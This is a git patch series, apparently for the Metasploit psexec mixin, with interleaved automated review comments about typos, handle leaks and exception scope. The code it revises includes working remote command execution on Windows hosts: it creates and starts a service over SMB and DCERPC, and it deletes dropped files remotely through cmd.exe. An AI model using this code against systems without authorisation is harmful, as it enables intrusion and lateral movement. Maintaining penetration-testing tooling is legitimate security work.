From af2b1ec25b72f8e6c28f213555d8c71d0c8b9f5f Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 15 Jan 2013 14:22:11 -0600 Subject: [PATCH 01/87] Clean up doc comments --- lib/msf/core/exploit/psexec.rb | 44 ++++++++++++++++++++-------------- 1 file changed, 26 insertions(+), 18 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index 103241a30f..e31a6a68c1 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -13,12 +13,15 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - # Retrives output from the executed command + # Retrieves output from the executed command + # + # @example + # get_output("C$", rhost, '\WINDOWS\Temp\outputfile.txt') + # # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails + # @param ip [String] Remote host to connect to + # @param file [String] Path to the output file relative to the +smbshare+ + # @return [String,nil] output or nil if retrieval fails def get_output(smbshare, ip, file) begin print_status("Getting the command output...") 
@@ -35,12 +38,14 @@ module Exploit::Remote::Psexec end - # This method executes a single windows command. If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. + # Executes a single windows command. + # + # If you want to retrieve the output of your command you'll have to + # redirect its output to a file and then use {#get_output} to retrieve + # it. Make sure to use the {#cleanup_after} method when you are done. + # # @param command [String] Should be a valid windows command - # @return true if everything wen't well + # @return [Boolean] true if everything wen't well def psexec(command) simple.connect("IPC$") @@ -152,14 +157,17 @@ module Exploit::Remote::Psexec return true end - # This is the cleanup method, removes .txt and .bat file/s created during execution + # This is the cleanup method, removes .txt and .bat file/s created + # during execution + # + # @example + # cleanup_after("C$", rhost, '\WINDOWS\Temp\output.txt', 'C:\WINDOWS\Temp\batchfile.bat') + # # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param text [File Path] Path to the text file relative to the smbshare - # Example: '\WINDOWS\Temp\output.txt' - # @param bat [File Path] Full path to the batch file created - # Example: 'C:\WINDOWS\Temp\batchfile.bat' - # @return only in the event of an error + # @param ip [String] IP address of remote host to connect to + # @param text [String] Path to the text file relative to the smbshare + # @param bat [String] Full path to the batch file created + # @return [StandarError] only in the event of an error def cleanup_after(smbshare, ip, text, bat) begin # Try and do cleanup command/s 
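Review bot: The new tag `# @return [StandarError] only in the event of an error` on cleanup_after misspells the class name, so YARD cannot resolve it to `StandardError`. It also documents only the error path; the body of cleanup_after continues outside this hunk, so the non-error return value should be checked there before it is written down, for example as `# @return [StandardError, nil] the rescued error, if any`. The psexec hunk on the same line keeps the typo in `true if everything wen't well`, which this doc cleanup could fix to `went` at the same time.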
@@ -183,7 +191,7 @@ module Exploit::Remote::Psexec def check_cleanup(smbshare, ip, text) simple.connect("\\\\#{ip}\\#{smbshare}") begin - if checktext = simple.open(text, 'ro') + if simple.open(text, 'ro') check = false else check = true From 6773a1063227173c3ce3f0a36ef42fa5aada7190 Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Tue, 15 Jan 2013 16:24:16 -0600 Subject: [PATCH 02/87] Made changes to cleanup to use file_dropper instead --- lib/msf/core/exploit/psexec.rb | 45 ++++++++++++---------------------- 1 file changed, 16 insertions(+), 29 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index e31a6a68c1..7e8b030564 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -12,6 +12,7 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB + include Msf::Exploit::FileDropper # Retrieves output from the executed command # @@ -47,7 +48,7 @@ module Exploit::Remote::Psexec # @param command [String] Should be a valid windows command # @return [Boolean] true if everything wen't well def psexec(command) - + print_status("#{peer} - Executing: #{command}") simple.connect("IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) 
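Review bot: In check_cleanup the result of `simple.open(text, 'ro')` is now discarded, so when the file still exists the opened handle cannot be closed before `simple.disconnect` runs. get_output in this file keeps its handle and calls `outfile.close`; the same pattern here, `fd = simple.open(text, 'ro')` followed by `fd.close` in the true branch, would keep the two methods consistent. The start and end of check_cleanup are outside the hunk, so this is based on the lines visible here.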
@@ -157,34 +158,20 @@ module Exploit::Remote::Psexec return true end - # This is the cleanup method, removes .txt and .bat file/s created - # during execution - # - # @example - # cleanup_after("C$", rhost, '\WINDOWS\Temp\output.txt', 'C:\WINDOWS\Temp\batchfile.bat') - # - # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [String] IP address of remote host to connect to - # @param text [String] Path to the text file relative to the smbshare - # @param bat [String] Full path to the batch file created - # @return [StandarError] only in the event of an error - def cleanup_after(smbshare, ip, text, bat) - begin - # Try and do cleanup command/s - cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup...") - psexec(cleanup) - if !check_cleanup(smbshare, ip, text) - print_error("#{peer} - Unable to cleanup. Make sure to manually remove files from the target.") - else - print_status("#{peer} - Cleanup was successful") - end - rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands. Error: #{cleanuperror}") - print_error("#{peer} - Make sure to manually remove files from the target") - return cleanuperror - end - end + # This method is called by file_dropper to remove files droped + # By your module + # + # @example + # file_rm('C:\WINDOWS\Temp\output.txt') + # + # @param file [String] Full path to a file on the remote host + # @return [StandardError] only in the event of an error + def file_rm(file) + delete = "%COMSPEC% /C del #{file}" + print_status("#{peer} - Deleting #{file}") + psexec(delete) + print_status("#{peer} - Command Ran") + end # Make sure the cleanup command worked # This method should only be called from within cleanup_after From f7571d89de913ccfb1fe0104d7f95d5ac6cb9f5b Mon Sep 17 00:00:00 2001 
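Review bot: file_rm prints `Command Ran` whatever `psexec(delete)` returns, and its `@return [StandardError] only in the event of an error` tag describes a rescue that the new method no longer has. psexec reports failure by returning false (visible in the later patches on this page), so the status line should depend on that result, e.g. `print_error("#{peer} - Unable to delete #{file}") unless psexec(delete)`. The path is interpolated into the cmd.exe line unquoted, so a path with spaces or `&` is split by the shell and the delete can miss the file; `delete = "%COMSPEC% /C del \"#{file}\""` avoids that for the common case. The comment kept below, `This method should only be called from within cleanup_after`, now refers to a method this hunk removes.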
From: Royce Davis Date: Wed, 16 Jan 2013 09:56:27 -0600 Subject: [PATCH 03/87] Fixed cleanup_after funciton to mimic file_dropper but not use file_dropper --- lib/msf/core/exploit/psexec.rb | 307 +++++++++++++++++---------------- 1 file changed, 156 insertions(+), 151 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index 7e8b030564..570dcd1634 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb 
@@ -10,153 +10,147 @@ module Msf module Exploit::Remote::Psexec - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB - include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB - # Retrieves output from the executed command - # - # @example - # get_output("C$", rhost, '\WINDOWS\Temp\outputfile.txt') - # - # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [String] Remote host to connect to - # @param file [String] Path to the output file relative to the +smbshare+ - # @return [String,nil] output or nil if retrieval fails - def get_output(smbshare, ip, file) - begin - print_status("Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue StandardError => output_error - print_error("Error getting command output. #{output_error.class}. #{output_error}.") - return nil - end - end + # Retrives output from the executed command + # @param smbshare [String] The SMBshare to connect to. Usually C$ + # @param ip [IP Address] Remote Host to Connect To + # @param file [File name] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return output or nil if fails + def get_output(smbshare, ip, file) + begin + print_status("Getting the command output...") + simple.connect("\\\\#{ip}\\#{smbshare}") + outfile = simple.open(file, 'ro') + output = outfile.read + outfile.close + simple.disconnect("\\\\#{ip}\\#{smbshare}") + return output + rescue StandardError => output_error + print_error("Error getting command output. #{output_error.class}. #{output_error}.") + return nil + end + end - # Executes a single windows command. - # - # If you want to retrieve the output of your command you'll have to - # redirect its output to a file and then use {#get_output} to retrieve - # it. 
Make sure to use the {#cleanup_after} method when you are done. - # - # @param command [String] Should be a valid windows command - # @return [Boolean] true if everything wen't well - def psexec(command) - print_status("#{peer} - Executing: #{command}") - simple.connect("IPC$") + # This method executes a single windows command. If you want to + # retrieve the output of your command you'll have to echo it + # to a .txt file and then use the get_output method to retrieve it + # Make sure to use the cleanup_after method when you are done. + # @param command [String] Should be a valid windows command + # @return true if everything wen't well + def psexec(command) - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) + vprint_status("#{peer} - Binding to #{handle} ...") + dcerpc_bind(handle) + vprint_status("#{peer} - Bound to #{handle} ...") - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil + vprint_status("#{peer} - Obtaining a service manager handle...") + scm_handle = nil + stubdata = + NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + begin + response = dcerpc.call(0x0f, stubdata) + if dcerpc.last_response 
!= nil and dcerpc.last_response.stub_data != nil + scm_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + servicename = Rex::Text.rand_text_alpha(11) + displayname = Rex::Text.rand_text_alpha(16) + holdhandle = scm_handle + svc_handle = nil + svc_status = nil - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception - end + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password + begin + vprint_status("#{peer} - Creating the service...") + response = dcerpc.call(0x0c, stubdata) + if dcerpc.last_response != nil and 
dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + svc_status = dcerpc.last_response.stub_data[24,4] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception + end - response = dcerpc.call(0x10, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + vprint_status("#{peer} - Opening service...") + begin + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + response = dcerpc.call(0x10, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end + vprint_status("#{peer} - Starting the service...") + stubdata = + svc_handle + NDR.long(0) + NDR.long(0) + begin + response = dcerpc.call(0x13, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue 
::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end + vprint_status("#{peer} - Removing the service...") + stubdata = + svc_handle + begin + response = dcerpc.call(0x02, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true - end + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end + + select(nil, nil, nil, 1.0) + simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") + return true + end # This method is called by file_dropper to remove files droped # By your module 
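Review bot: The doc comments on get_output and psexec return to their pre-cleanup wording in this hunk (`# Retrives output from the executed command`, `@param ip [IP Address]`, `@return output or nil if fails`), which undoes PATCH 01 on this page. That looks like an accidental side effect of the re-indent rather than an intended change, since the commit message only mentions cleanup_after. Restoring the YARD-typed comments from PATCH 01 and keeping the whitespace change in its own commit would make the functional edits (dropping `include Msf::Exploit::FileDropper`, the `simple.connect` path) reviewable on their own.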
@@ -168,28 +162,39 @@ module Exploit::Remote::Psexec # @return [StandardError] only in the event of an error def file_rm(file) delete = "%COMSPEC% /C del #{file}" - print_status("#{peer} - Deleting #{file}") + vprint_status("#{peer} - Deleting #{file}") psexec(delete) - print_status("#{peer} - Command Ran") end - # Make sure the cleanup command worked - # This method should only be called from within cleanup_after - def check_cleanup(smbshare, ip, text) - simple.connect("\\\\#{ip}\\#{smbshare}") - begin - if simple.open(text, 'ro') - check = false - else - check = true - end - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return check - rescue StandardError => check_error - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return true - end - end + # This method stores files in an Instance array + # The files are then deleted from the remote host once + # the cleanup_after method is called + # + # @example + # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") + # @param file [String] Full path to the file on the remote host + def register_file_for_cleanup(*file) + @dropped_files ||= [] + @dropped_files += file + end + + # This method removes any files that were dropped on the remote system + # and marked with the register_file_for_cleanup method + def cleanup_after + print_status("#{peer} - Removing files dropped by your module/exploit") + if !@dropped_files + return + end + @dropped_files.delete_if do |file| + begin + file_rm(file) + print_good("#{peer} - Deleted #{file}") + rescue StandardError => file_rm_error + print_error("#{peer} - Unable to delte #{file}. #{file_rm_error}") + return + end + end + end end From 00a9c7259599c92528b50e246ef83288c84f25c3 Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Thu, 17 Jan 2013 19:02:13 -0600 Subject: [PATCH 04/87] Fixed exception handeling. No longer using rescure StandardError --- lib/msf/core/exploit/psexec.rb | 345 ++++++++++++++++----------------- 1 file changed, 172 insertions(+), 173 deletions(-) 
diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index 570dcd1634..9763b6d1f7 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb 
@@ -10,192 +10,191 @@ module Msf module Exploit::Remote::Psexec - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB - # Retrives output from the executed command - # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails - def get_output(smbshare, ip, file) - begin - print_status("Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue StandardError => output_error - print_error("Error getting command output. #{output_error.class}. #{output_error}.") - return nil - end - end - - - # This method executes a single windows command. If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. 
- # @param command [String] Should be a valid windows command - # @return true if everything wen't well - def psexec(command) - - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false + # Retrives output from the executed command + # @param smbshare [String] The SMBshare to connect to. Usually C$ + # @param ip [IP Address] Remote Host to Connect To + # @param file [File name] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return output or nil if fails + def get_output(smbshare, ip, file) + begin + print_status("Getting the command output...") + simple.connect("\\\\#{ip}\\#{smbshare}") + outfile = simple.open(file, 'ro') + output = outfile.read + outfile.close + simple.disconnect("\\\\#{ip}\\#{smbshare}") + return output + rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error + print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") + return nil + end end - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + # This method executes a single windows command. 
If you want to + # retrieve the output of your command you'll have to echo it + # to a .txt file and then use the get_output method to retrieve it + # Make sure to use the cleanup_after method when you are done. + # @param command [String] Should be a valid windows command + # @return true if everything wen't well + def psexec(command) - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") + + handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) + vprint_status("#{peer} - Binding to #{handle} ...") + dcerpc_bind(handle) + vprint_status("#{peer} - Bound to #{handle} ...") + + vprint_status("#{peer} - Obtaining a service manager handle...") + scm_handle = nil + stubdata = + NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + begin + response = dcerpc.call(0x0f, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + scm_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end + + servicename = Rex::Text.rand_text_alpha(11) + displayname = Rex::Text.rand_text_alpha(16) + holdhandle = scm_handle + svc_handle = nil + svc_status = nil + + stubdata = 
+ scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password + begin + vprint_status("#{peer} - Creating the service...") + response = dcerpc.call(0x0c, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + svc_status = dcerpc.last_response.stub_data[24,4] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end + + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception + end + + vprint_status("#{peer} - Opening service...") + begin + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + + response = dcerpc.call(0x10, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end + + vprint_status("#{peer} - Starting the service...") + stubdata = + svc_handle + NDR.long(0) + NDR.long(0) + begin + response = dcerpc.call(0x13, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end + + vprint_status("#{peer} - Removing the service...") + stubdata = + svc_handle + begin + response = dcerpc.call(0x02, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end + + 
vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end + + select(nil, nil, nil, 1.0) + simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") + return true end - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception + # This method is called by file_dropper to remove files droped + # By your module + # + # @example + # file_rm('C:\WINDOWS\Temp\output.txt') + # + # @param file [String] Full path to a file on the remote host + # @return [StandardError] only in the event of an error + def file_rm(file) + delete = "%COMSPEC% /C del #{file}" + vprint_status("#{peer} - Deleting #{file}") + psexec(delete) end - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - - response = dcerpc.call(0x10, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false + # This method stores files in an Instance array + # The files are then deleted from the remote host once + # the cleanup_after method is called + # + # @example + # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") + # @param file [String] Full path to the file on the remote host + def register_file_for_cleanup(*file) + @dropped_files ||= [] + @dropped_files += file end - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false + # This method removes any files that were dropped on the remote system + # and marked with the 
register_file_for_cleanup method + def cleanup_after + print_status("#{peer} - Removing files dropped by your module/exploit") + if !@dropped_files + return + end + begin + @dropped_files.delete_if do |file| + file_rm(file) + print_good("#{peer} - Deleted #{file}") + end + rescue ::Exception => cleanup_error + print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") + end end - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end - - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end - - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true - end - - # This method is called by file_dropper to remove files droped - # By your module - # - # @example - # file_rm('C:\WINDOWS\Temp\output.txt') - # - # @param file [String] Full path to a file on the remote host - # @return [StandardError] only in the event of an error - def file_rm(file) - delete = "%COMSPEC% /C del #{file}" - vprint_status("#{peer} - Deleting #{file}") - psexec(delete) - end - - # This method stores files in an Instance array - # The files are then deleted from the remote host once - # the cleanup_after method is called - # - # @example - # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") - # @param file [String] Full path to the file on the remote host - def register_file_for_cleanup(*file) - @dropped_files ||= [] - @dropped_files += file - end - - # This method removes any files that were dropped on the remote system - # and marked with the register_file_for_cleanup method - def cleanup_after - print_status("#{peer} - Removing files dropped by your module/exploit") - if !@dropped_files - return - 
end - @dropped_files.delete_if do |file| - begin - file_rm(file) - print_good("#{peer} - Deleted #{file}") - rescue StandardError => file_rm_error - print_error("#{peer} - Unable to delte #{file}. #{file_rm_error}") - return - end - end - end - end end From a2f66a8fef6dc2620e0a54d4b53a32bd36a85d7c Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Fri, 18 Jan 2013 09:33:44 -0600 Subject: [PATCH 05/87] Fixed msftidy complaints --- lib/msf/core/exploit/psexec.rb | 330 ++++++++++++++++----------------- 1 file changed, 165 insertions(+), 165 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index 9763b6d1f7..b10e1453f3 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb 
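Review bot: In the new cleanup_after the `rescue` sits outside the `delete_if` block but its message interpolates `file`, which is the block parameter and not in scope there; unless the including module defines a `file` method, a failed deletion raises NameError from the handler instead of printing the intended error. `rescue ::Exception => cleanup_error` is also wider than the `StandardError` it replaces and will catch Interrupt and SystemExit, so an operator's Ctrl-C during cleanup is swallowed. Moving the begin/rescue back inside the block with `rescue StandardError => e` and `next false` keeps `file` in scope and lets the loop continue. In get_output on the same hunk, every `Rex::Proto::SMB::Exceptions::ErrorCode` is reported as `The file #{file} doesn't exist`, and the error path skips `simple.disconnect`; an `ensure` for the disconnect and a message that prints the actual error would be more accurate.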
@@ -10,190 +10,190 @@ module Msf module Exploit::Remote::Psexec - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB - # Retrives output from the executed command - # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails - def get_output(smbshare, ip, file) - begin - print_status("Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error - print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") - return nil - end - end + # Retrives output from the executed command + # @param smbshare [String] The SMBshare to connect to. Usually C$ + # @param ip [IP Address] Remote Host to Connect To + # @param file [File name] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return output or nil if fails + def get_output(smbshare, ip, file) + begin + print_status("Getting the command output...") + simple.connect("\\\\#{ip}\\#{smbshare}") + outfile = simple.open(file, 'ro') + output = outfile.read + outfile.close + simple.disconnect("\\\\#{ip}\\#{smbshare}") + return output + rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error + print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") + return nil + end + end - # This method executes a single windows command. 
